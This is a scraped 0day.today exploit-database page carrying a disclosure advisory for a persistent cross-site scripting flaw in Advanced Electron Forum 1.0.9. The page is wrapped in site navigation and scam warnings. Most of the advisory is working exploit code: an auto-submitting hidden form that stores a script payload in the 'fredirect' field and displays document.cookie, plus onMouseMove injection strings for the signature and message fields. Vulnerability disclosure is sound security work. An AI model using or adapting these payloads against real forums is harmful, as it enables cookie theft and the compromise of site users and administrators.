0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting
[+] Credits: hyp3rlinx Vendor: ============================= www.anelectron.com/downloads/ Product: ==================================== Advanced Electron Forum v1.0.9 (AEF) Exploit patched current version. Vulnerability Type: =================== Persistent XSS CVE Reference: ============== N/A Vulnerability Details: ===================== In Admin panel under Edit Boards / General Stuff / General Options There is an option to sepcify a redirect URL for the forum. See --> Redirect Forum: Enter a URL to which this forum will be redirected to. The redirect input field is vulnerable to a persistent XSS that will be stored in the MySQL database and execute attacker supplied client side code each time a victim visits the following URLs. http://localhost/AEF(1.0.9)_Install/index.php? http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1 Exploit code(s): =============== Persistent XSS <form id="XSS-DE-PERSISTO" action=" http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1" method="post"> <input type="hidden" name="editmother" value="c1" /> <input type="hidden" name="forder" value="1" /> <input type="hidden" name="fstatus" value="1" /> <input type="hidden" name="fredirect" value='"/><script>alert("XSS hyp3rlinx \n\n" + document.cookie)</script>' /> <input type="hidden" name="fimage" value="" /> <input type="hidden" name="fname" value="Generals" /> <input type="hidden" name="fdesc" value="hyp3rlinx" /> <input type="hidden" name="ftheme" value="0" /> <input type="hidden" name="frulestitle" value="MAYHEM" /> <input type="hidden" name="frules" value="0" /> <input type="hidden" name="rss" value="10" /> <input type="hidden" name="rss_topic" value="0" /> <input type="hidden" name="member[-1]" value="on" /> <input type="hidden" name="member[0]" value="on" /> <input type="hidden" name="member[3]" value="on" /> <input type="hidden" name="inc_mem_posts" value="on" /> <input type="hidden" name="allow_poll" value="on" /> <input type="hidden" name="allow_html" value="on" /> <input type="hidden" name="mod_posts" value="on" /> <input type="hidden" name="editboard" value="Edit+Forum" /> <script>document.getElementById('XSS-DE-PERSISTO').submit()</script> </form> Some other misc XSS(s) under 'Signature' area. http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature on Anchor link setting http://"onMouseMove="alert(0) AND http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm email link: mailto:"onMouseMove="alert(1) Disclosure Timeline: ===================================== Vendor Notification: NA January 17, 2016 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ High Description: ================================================================= Request Method(s): [+] POST Vulnerable Product: [+] AEF v1.0.9 (exploit patched version) Vulnerable Parameter(s): [+] 'fredirect' # 0day.today [2024-12-25] #